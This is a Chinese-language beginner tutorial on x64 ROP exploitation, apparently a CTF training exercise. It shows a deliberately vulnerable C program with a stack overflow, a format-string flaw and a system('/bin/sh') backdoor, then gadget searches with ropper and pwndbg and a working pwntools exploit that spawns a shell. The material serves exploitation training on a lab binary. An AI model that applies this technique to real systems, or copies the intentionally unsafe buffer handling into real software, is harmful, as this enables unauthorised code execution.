目录
1.ROP编程
1.安装ROPgadget
apt install python3-ropgadget
2.安装ropper
pip3 install ropper
- 这里有我集成的pwntools一体化安装工具
git clone https://gitee.com/liweijun0302/pwntools_env.git
- 以上两个工具都可以检测程序中的gadget
- 区别在于ropper是多线程的。搜索速度快很多
- 在打kernel之前与ROPgadget区别不大
- 我们现在就直接使用ropper来搜索gadget
2.question_4_2_x64.c
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
char sh[] = "/bin/sh";
int func(){
system(sh);
return 0;
}
int dofunc(){
char b[8] = {};
puts("input:");
read(0,b,0x30);
printf(b);
return 0;
}
int main(){
dofunc();
return 0;
}
3.函数分析
1.后门函数func()
- 有后门函数就比较简单了
- 只要控制程序执行func,并且把func的参数传递控制好即可
- 控制x64的程序的函数传参就要用到ROP编程
- 这里先简单介绍一下x64传参过程
- 如图所示
- 这里要学一点64位传参的寄存器顺序
依次是 rdi rsi rdx rcx r8 r9
2.找到我们需要的gadget
- 我们逐渐开始使用ropper
ropper -f question_4_2_x64
0x00000000004007a3: call qword ptr [rdi];
0x00000000004005a4: cmpsd dword ptr [rsi], dword ptr [rdi]; or ah, byte ptr [rax]; add byte ptr [rcx], al; pop rbp; ret;
0x00000000004005cb: lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret;
0x00000000004005c9: mov ebp, esp; lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret;
0x00000000004005c8: mov rbp, rsp; lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret;
0x0000000000400614: mov rdi, rax; mov eax, 0; call 0x4c0; mov eax, 0; leave; ret;
0x00000000004006a3: pop rdi; ret;
- 为了方便加上grep
- 找到了pop rdi;ret
- 找一下bin/sh 的地址
pwndbg> search "bin/sh"
question_4_2_x64_30 0x601049 0x68732f6e6962 /* 'bin/sh' */
libc-2.27.so 0x7ffff7b95d89 0x650068732f6e6962 /* 'bin/sh' */
warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd0d05, halting search.
- func的地址我们可以直接用elf去生成,我们就不必自己找了
- 但是这里还是看一下
pwndbg> p &func
$1 = (<text variable, no debug info> *) 0x4005c7 <func>
4.编写exp
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = process('./question_4_2_x64_30')
# gdb,attach(io)
elf = ELF('question_4_2_x64_30')
pop_rdi_ret = 0x4006a3
bin_sh_addr = 0x601048
func_addr = elf.symbols['func']
payload = b'a'*16 + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(func_addr)
io.sendlineafter('input:',payload)
io.interactive()